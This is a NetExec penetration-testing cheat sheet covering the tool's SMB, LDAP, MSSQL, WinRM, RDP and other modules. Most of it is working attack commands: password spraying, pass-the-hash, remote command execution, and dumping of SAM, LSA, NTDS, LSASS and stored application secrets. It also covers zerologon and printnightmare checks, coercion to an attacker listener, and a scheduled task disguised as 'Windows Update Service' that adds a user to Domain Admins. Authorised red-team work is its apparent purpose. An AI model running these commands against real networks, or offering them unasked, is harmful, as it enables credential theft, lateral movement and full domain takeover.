Setup
Dependencies
- Python 3
- Rust (curl –proto ‘=https’ –tlsv1.2 -sSf https://sh.rustup.rs | sh)
- Python arc4 dependency (pip install arc4 OR sudo apt policy python3-arc4 #on kali)
Installation
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
netexec --version
- Update
pipx upgrade netexec # Will update if there is a new version
Basic usage
netexec <protocol> <target> -u <user> -p <password>
nxc <protocol> <target> -u <user> -p <password>
# example over SMB
netexec smb <target> -u <user> -p <password>
Supported protocols include smb, ldap, mssql, ssh, ftp, winrm, rdp, wmi, nfs, vnc, and more.
Every protocol accepts the same target syntax, and formats can be combined in a single command:
netexec <protocol> dc01.domain.local # hostname
netexec <protocol> 192.168.1.10 10.0.0.5 # one or more IPs
netexec <protocol> 192.168.1.0/24 # CIDR
netexec <protocol> 192.168.1.10-20 # range
netexec <protocol> targets.txt # file with one target per line
Authentication
# Null session
netexec smb <target> -u '' -p ''
# Guest
netexec smb <target> -u 'guest' -p ''
# Local account (not domain)
netexec smb <target> -u <user> -p <password> --local-auth
# Pass-the-hash (LM:NTLM or NTLM only)
netexec smb <target> -u <user> -H <NT_HASH>
netexec smb <target> -u <user> -H <LM_HASH>:<NT_HASH>
# Kerberos (password or cached ticket) required `export KRB5CCNAME=~/ticket.ccache`
netexec smb <target> -u <user> -p <password> -k
netexec ldap <target> --use-kcache
# Credential/user lists (see Password spraying below for bulk auth)
netexec smb <target> -u users.txt -p passwords.txt
netexec smb <target> -u users.txt -H hashes.txt
Using modules
# List available modules for a protocol
netexec smb -L
# View a module's options
netexec smb -M lsassy --options
# Run a module
netexec smb <target> -u <user> -p <password> -M lsassy
# Pass module options (KEY=value, msfvenom style)
netexec smb <target> -u <user> -p <password> -M lsassy -o COMMAND=whoami
# Run several modules in one pass
netexec smb <target> -u <user> -p <password> -M spider_plus -M lsassy -M gpp_password
DNS options
nxc <protocol> <target> -u <user> -p <password> --dns-server <dns-server ip>
nxc <protocol> <target> -u <user> -p <password> --dns-timeout <seconds>
nxc <protocol> <target> -u <user> -p <password> --dns-tcp # Use TCP for DNS
nxc <protocol> <target> -u <user> -p <password> -6 # Enforce ipv6
Enumeration
# Basic host info (OS, hostname, domain, signing state)
netexec smb <target>
# Null session / guest logon check
netexec smb <target> -u '' -p ''
netexec smb <target> -u 'guest' -p ''
# Hosts with SMB signing disabled (relay candidates)
netexec smb <target> --gen-relay-list relay_targets.txt
# Domain users
netexec smb <target> -u '' -p '' --users
netexec smb <target> -u '' -p '' --users --users-export output.txt
netexec smb <target> -u '' -p '' --rid-brute
# Local Groups
netexec smb <target> -u <user> -p <password> --local-group
# Password spraying (one password against many users)
netexec smb <target> -u users.txt -p '<Password123>' --continue-on-success
# Credential list against user list (no bruteforce pairing)
netexec smb <target> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Throttle to avoid lockouts
netexec smb <target> -u users.txt -p '<Password123>' --continue-on-success --delay 5
# Logged-On Users with the Remote Registry Service
netexec smb <target> -u <user> -p <password> --reg-sessions
netexec smb <target> -u <user> -p <password> --reg-sessions <username>
netexec smb <target> -u <user> -p <password> --reg-sessions './users.txt' # list of usernames
# Enumerate Shares and Access
netexec smb <target> -u <user> -p <password> --shares
netexec smb <target> -u <user> -p <password> --shares --shares READ,WRITE
# Enumerate Network Interfaces
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> --interfaces
# Enumerate the LmCompatibilityLevel (NTLMv1) on the remote target via the remote registry:
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> -M ntlmv1
# Enumerate Disks
netexec smb <target> -u <user> -p <password> --disks
# Enumerate Domain Password Policy
netexec smb <target> -u <user> -p <password> --pass-pol
# Enumerate users/groups anonymously
netexec ldap <target> -u '' -p '' --users
netexec ldap <target> -u '' -p '' --groups
# Enumerate just the active users
netexec ldap <target> -u <user> -p <password> --active-users
# Get User Descriptions (options: FILTER, PASSWORDPOLICY, MINLENGTH)
netexec ldap <target> -u <user> -p <password> -M get-desc-users
# Export all users
netexec ldap <target> -u <user> -p <password> --users-export output.txt
# Enumerate all members in specific group
netexec ldap <target> -u <user> -p <password> --groups "Domain Admins"
# Dump PSO (Fine-Grained Password Policies (FGPPs) or Password Settings Objects (PSOs))
netexec ldap <target> -u <user> -p <password> --pso
# enumerate the `scriptPath` attribute of Active Directory users (options: FILTER, OUTPUTFILE)
netexec ldap <target> -u <user> -p <password> -M get-scriptpath
SMB
# Everything at once
netexec smb <target> -u <user> -p <password> --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
# Pull a remote file
netexec smb <target> -u <user> -p <password> --share <share> --get-file <remote_path> <local_path>
# Push a local file to a share
netexec smb <target> -u <user> -p <password> --share <share> --put-file <local_path> <remote_path>
# Crawl every readable/writable share for interesting files
netexec smb <target> -u <user> -p <password> -M spider_plus
netexec smb <target> -u <user> -p <password> -M spider_plus -o DOWNLOAD_FLAG=true EXTENSIONS=xlsx,docx,pdf
# Execute a command / PowerShell
netexec smb <target> -u <user> -p <password> -x whoami
netexec smb <target> -u <user> -p <password> -X 'Get-Process'
# Logged-On Users with the Workstation Service
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> --loggedon-users
netexec smb <target> -u <user> -p <password> --loggedon-users <username>
# Windows interactive sessions (needed to know who can be impersonated, see schtask_as below)
netexec smb <target> -u <user> -p <password> --qwinsta
netexec smb <target> -u <user> -p <password> --qwinsta <username>
# Execute a command as another logged-on user (needs local admin)
netexec smb <target> -u <user> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
## example
netexec smb <target> -u <user> -p <password> --local-auth -M schtask_as -o USER=[target] CMD="whoami" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\"
netexec smb <target> -u <user> -p <password> --local-auth -M schtask_as -o USER=[target] CMD="powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\"
# Change a user's password / add or remove to a group
netexec smb <target> -u <user> -p <password> -M change-password -o NEWPASS=<new_pass>
netexec smb <target> -u <user> -p <password> -M change-password -o NEWNTHASH=31d6cfe0d16ae931b73c59d7e0c089c0
netexec smb <target> -u <user> -p <password> -M change-password -o USER=<target_user> NEWPASS=<new_pass>
netexec smb <target> -u <user> -p <password> -M change-password -o USER=<target_user> NEWNTHASH=<new_nthash>
netexec smb <target> -u <user> -p <password> -M adduser -o USER=<target_user> GROUP='Domain Admins'
netexec smb <target> -u <user> -p <password> -M modify-group -o USER=<target_user> GROUP=<target_group> REMOVE=True
# Generate a hosts file, krb5.conf, or a TGT for Kerberos auth
netexec smb <target> -u <user> -p <password> --generate-hosts-file /etc/hosts
netexec smb <target> -u <user> -p <password> --generate-krb5-file /etc/krb5.conf
netexec smb <target> -u <user> -p <password> --generate-tgt <basename>
# Enumerate remote processes
netexec smb <target> -u <user> -p <password> --tasklist
netexec smb <target> -u <user> -p <password> --tasklist keepass.exe
# Killing remote processes
netexec smb <target> -u <user> -p <password> --taskkill PID
netexec smb <target> -u <user> -p <password> --taskkill --taskkill process_name.exe
LDAP
# Common AD misconfig sweep
netexec ldap <target> -u <user> -p <password> --trusted-for-delegation --password-not-required --admin-count --users --groups
# Kerberoasting / AS-REP roasting
netexec ldap <target> -u <user> -p <password> --kerberoasting hashes.txt
netexec ldap <target> -u <user> -p <password> --kerberoasting hashes.txt --targeted-kerberoast <user1> <user2> # or <users.list>
netexec ldap <target> -u <user> -p <password> --asreproast hashes.txt
# BloodHound collection
netexec ldap <target> -u <user> -p <password> --bloodhound --dns-server <dc_ip> --dns-tcp -c all
# Raw LDAP queries (alternative to ldapsearch)
netexec ldap <target> -u <user> -p <password> -q "(objectClass=user)" -a sAMAccountName
# LDAP signing/channel binding requirements
netexec ldap <target> -u <user> -p <password> -M ldap-checker # REMOVED: Checking for signing and channel binding is now done on the host enumeration, see host banner
# ADCS, MachineAccountQuota, pre-created computer accounts, delegation etc
netexec ldap <target> -u <user> -p <password> -M adcs # List All PKI Enrollment Servers
netexec ldap <target> -u <user> -p <password> -M adcs -o SERVER=<CA> # List All Certificates Inside a PKI
netexec ldap <target> -u <user> -p <password> -M maq # Get the Machine Account Quota
netexec ldap <target> -u <user> -p <password> -M pre2k # Pre2k Computer Account Abuse
netexec ldap <target> -u <user> -p <password> --find-delegation # Misconfigured Delegation
netexec ldap <target> -u <user> -p <password> --trusted-for-delegation # Unconstrained Delegation
netexec ldap <target> -u <user> -p <password> --admin-count # Get all user objects with the adminCount attribute set to 1
# Domain SID, DC list, and trusts
netexec ldap <target> -u <user> -p <password> --get-sid
netexec ldap <target> -u <user> -p <password> -M dc-list
netexec ldap <target> -u <user> -p <password> --dc-list # Enumerate DC including Domain Trusts
netexec ldap <target> -u <user> -p <password> -M enum_trusts # # REMOVED: Moved to `--dc-list` argument
# Read DACL Rights
netexec ldap <target> -u <user> -p <password> --kdcHost <domain_controller> -M daclread -o TARGET=Administrator ACTION=read # Read all the ACEs of the Administrator
netexec ldap <target> -u <user> -p <password> --kdcHost <domain_controller> -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=Obak3 # Read all the rights the Obak3 user has on the Administrator
netexec ldap <target> -u <user> -p <password> --kdcHost <domain_controller> -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync # Read all the principals that have DCSync rights on the domain
# Query LDAP _(alternative to ldapsearch)_
netexec ldap <target> -u <user> -p <password> --query "(sAMAccountName=Administrator)" ""
netexec ldap <target> -u <user> -p <password> --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet"
# Entra ID
netexec ldap <target> -u <user> -p <password> -M entra-id
MSSQL / SSH / FTP
# MSSQL auth + command execution via xp_cmdshell
netexec mssql <target> -u <user> -p <password> # Including Encryption settings and Channel Binding configuration
netexec mssql <target> -d <domain> -u <user> -p <password> # For Windows Auth, if SMB port close, add the flag `-d <domain>`
netexec mssql <target> -u <user> -p <password> --local-auth
netexec mssql <target> -u <user> -p <password> -M mssql_priv -o ACTION=privesc # Impersonating
netexec mssql <target> -u <user> -p <password> -M mssql_priv # Check after `mssql_priv` Module
netexec mssql <target> -u <user> -p <password> -M mssql_priv -o ACTION=rollback # Rollback sysadmin privs in production
netexec mssql <target> -u <user> -p <password> -x whoami
netexec mssql <target> -u <user> -p <password> -q 'SELECT name FROM sys.databases' # List databases
netexec mssql <target> -u <user> -p <password> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
netexec mssql <target> -u <user> -p <password> --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt # Upload a file
netexec mssql <target> -u <user> -p <password> --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file # Download a file
netexec mssql <target> -u <user> -p <password> -M enum_links # Find Linked Servers
netexec mssql <target> -u <user> -p <password> -M exec_on_link -o LINKED_SERVER=<MSSQL_LINKED_SERVER> COMMAND='select @@servername' # Execute MSSQL Queries on a Linked Server
netexec mssql <target> -u <user> -p <password> -M link_enable_cmdshell -o LINKED_SERVER=<MSSQL_LINKED_SERVER> ACTION=enable # Enable xp_cmdshell on a Linked Server
netexec mssql <target> -u <user> -p <password> -M link_xpcmd -o LINKED_SERVER=<MSSQL_LINKED_SERVER> CMD='whoami' # Command Execution on a Linked Server
netexec mssql <target> -u <user> -p <password> -M link_enable_cmdshell -o LINKED_SERVER=<MSSQL_LINKED_SERVER> ACTION=disable # Disable xp_cmdshell on a Linked Server
# SSH auth (password or key) + command execution
netexec ssh <target> -u <user> -p <password>
netexec ssh <target> -u <user> --key-file id_rsa
netexec ssh <target> -u <user> -p <password> -x "uname -a"
netexec ssh <target> -u <user> -p <password> --put-file file.txt /tmp/file.txt # Send a File to the Remote Target
netexec ssh <target> -u <user> -p <password> --get-file /tmp/file.txt file.txt # Get a File From the Remote Target
# FTP browsing and download
netexec ftp <target> -u <user> -p <password> --ls
netexec ftp <target> -u <user> -p <password> --ls <folder>
netexec ftp <target> -u <user> -p <password> --get <file>
netexec ftp <target> -u <user> -p <password> --put <local-file> <remote-path>
Other protocols
# WinRM auth + command execution
netexec winrm <target> -u <user> -p <password>
netexec winrm <target> -u <user> -p <password> --laps # If LAPS is used inside the domain, use `--laps <username>` if default administrator name is not "administrator"
netexec winrm <target> -u <user> -p <password> -x whoami
netexec winrm <target> -u <user> -p <password> --dpapi # Dump Credential Manager secrets for the connecting user. No Admin privileges needed!
# WMI command execution
netexec wmi <target> -u <user> -p <password> -x whoami # For Windows Auth, if SMB port close, add the flag `-d <domain>`
netexec wmi <target> -u <user> -p <password> --local-auth
# RDP: NLA check + screenshot
netexec rdp <target> -u <user> -p <password>
netexec rdp <target> -u <user> -p <password> --screenshot --screentime 10
netexec rdp <target> -u <user> -p <password> --nla-screenshot # if NLA is disabled
netexec rdp <target> -u <user> -p <password> -x whoami # This functionality is still in beta testing and was added in 2025
# NFS: enumerate exports, list, and pull files
netexec nfs <target>
netexec nfs <target> --shares
netexec nfs <target> --share '/var/nfs/general' --ls '/'
netexec nfs <target> --get-file /home/user/Desktop/test/test.txt test.txt # Download a file
netexec nfs <target> --put-file test2.txt /home/user/Desktop/ # Upload a file, with chmod 777 permissions by default (this can be changed with `--chmod`)
# VNC auth + screenshot
netexec vnc <target> -p <password>
netexec vnc <target> -p <password> --screenshot
netexec vnc <target> -p <password> --screenshot --screentime <seconds>
Credential dumping
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> --sam
netexec smb <target> -u <user> -p <password> --lsa # Requires Domain Admin or Local Admin Priviledges on target Domain Controller
netexec smb <target> -u <user> -p <password> --ntds
netexec smb <target> -u <user> -p <password> --ntds --enabled
netexec smb <target> -u <user> -p <password> --ntds vss
netexec smb <target> -u <user> -p <password> --ntds --user <username>
netexec smb <target> -u <user> -p <password> --dpapi
netexec smb <target> -u <user> -p <password> --laps
netexec smb <target> -u <user> -p <password> -M lsassy
netexec smb <target> -u <user> -p <password> -M nanodump
# gMSA passwords
netexec ldap <target> -u <user> -p <password> --gmsa
# Group Policy Preferences leftover creds
netexec smb <target> -u <user> -p <password> -M gpp_password
# Chain several dumping flags/modules in one pass
netexec smb <target> -u <user> -p <password> --sam --lsa --dpapi
Vulnerability checks
netexec smb <target> -u '' -p '' -M zerologon
netexec smb <target> -u <user> -p <password> -M nopac # needs valid creds
netexec smb <target> -u '' -p '' -M printnightmare
netexec smb <target> -u '' -p '' -M smbghost
netexec smb <target> -u '' -p '' -M ms17-010
netexec smb <target> -u <user> -p <password> -M ntlm_reflection # CVE-2025-33073, needs valid creds
# Coercion checks (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce)
netexec smb <target> -u '' -p '' -M coerce_plus
netexec smb <target> -u '' -p '' -M coerce_plus -o LISTENER=<attacker_ip>
netexec smb <target> -u '' -p '' -M coerce_plus -o LISTENER=<attacker_ip> METHOD=petitpotam
netexec smb <target> -u '' -p '' -M coerce_plus -o L=<attacker_ip> M=p
# Run several checks at once
netexec smb <target> -u <user> -p <password> -M zerologon -M printnightmare -M nopac
SCCM
# Enumerate Primary Site Server and Distribution Point via recon6
netexec smb <target> -u <user> -p <password> -M sccm-recon6
# Enumerate SCCM
netexec ldap <target> -u <user> -p <password> -M sccm -o REC_RESOLVE=TRUE
# Dump SCCM
# _(Requires Domain Admin or Local Admin Priviledges on target Domain Controller)_
netexec smb <target> -u <user> -p <password> --sccm
netexec smb <target> -u <user> -p <password> --sccm --sccm disk
netexec smb <target> -u <user> -p <password> --sccm --sccm wmi
Useful modules
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> -M bitlocker # Enumerate Bitlocker
netexec smb <target> -u <user> -p <password> -M webdav # WebClient service check (PetitPotam prereq)
netexec smb <target> -u <user> -p <password> -M spooler # Spooler service check (PrinterSpooler prereq)
netexec smb <target> -u <user> -p <password> -M veeam # Dump creds from local Veeam SQL DB
netexec smb <target> -u <user> -p <password> -M enum_av # Enumerate installed AV/EDR
netexec smb <target> -u <user> -p <password> -M reg -o KEY=<registry_path> # Read a registry key
netexec smb <target> -u <user> -p <password> -M keepass_discover
netexec smb <target> -u <user> -p <password> -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
netexec smb <target> -u <user> -p <password> -M winscp
netexec smb <target> -u <user> -p <password> -M wifi # Get the WIFI password register in Windows
netexec smb <target> -u <user> -p <password> -M teams_localdb # Dump Microsoft Teams cookies
netexec smb <target> -u <user> -p <password> -M backup_operator # don't need to local admin privilege on the remote target if you are in SeBackupPrivilege
netexec smb <target> -u <user> -p <password> -M wam # Dump access token for Azure and Microsoft 365 from Token Broker Cache
netexec smb <target> -u <user> -p <password> -M wam --mkfile masterkeys.txt
netexec smb <target> -u <user> -p <password> -M wam --pvk domain_backup_key.pvk
netexec smb <target> -u <user> -p <password> -M putty # Dump private Keys stored for authentication or stored proxy credentials
netexec smb <target> -u <user> -p <password> -M vnc # RealVNC or TightVNC
netexec smb <target> -u <user> -p <password> -M mremoteng # Dump mRemoteNG stored credentials
netexec smb <target> -u <user> -p <password> -M notepad # Dump unsaved Notepad documents finding credentials
netexec smb <target> -u <user> -p <password> -M notepad++ # Dump unsaved Notepad++ documents finding credentials
netexec smb <target> -u <user> -p <password> -M rdcman # Dump Remote Desktop Connection Manager credentials
netexec smb <target> -u <user> -p <password> -M eventlog_creds # Parse Windows Event ID 4688 and Sysmon Logs
netexec smb <target> -u <user> -p <password> -M rclone # Dumps credentials from unencrypted Rclone config files
netexec smb <target> -u <user> -p <password> -M security-questions # Dump a local user's security questions if set
netexec smb <target> -u <user> -p <password> -M dns-nonsecure # Get DNS zones configured with `Nonsecure and secure` setting for dynamic updates. This misconfiguration allows unauthenticated users to add DNS records.
Logging & database
# Log the current command's output to a file
netexec smb <target> -u <user> -p <password> --log run.log
NetExec stores every credential and result it sees in a per-protocol SQLite database under ~/.nxc/workspaces. Use the nxcdb shell to browse or export it:
nxcdb
nxcdb (default) > workspace create <engagement_name>
nxcdb (<engagement_name>) > proto smb
nxcdb (<engagement_name>)(smb) > creds
nxcdb (<engagement_name>)(smb) > export shares detailed shares.csv
Notes
-M <module>loads a NetExec module;-o KEY=VALUEpasses module-specific options;-Llists all available modules for a protocol.- Most modules need valid domain creds (or a hash) — start with null/guest auth to find low-hanging fruit before spraying.
- Add
--dns-server <ip>,--dns-tcp, or-6when the target isn’t resolvable through your default resolver. - Full module list and options: netexec.wiki
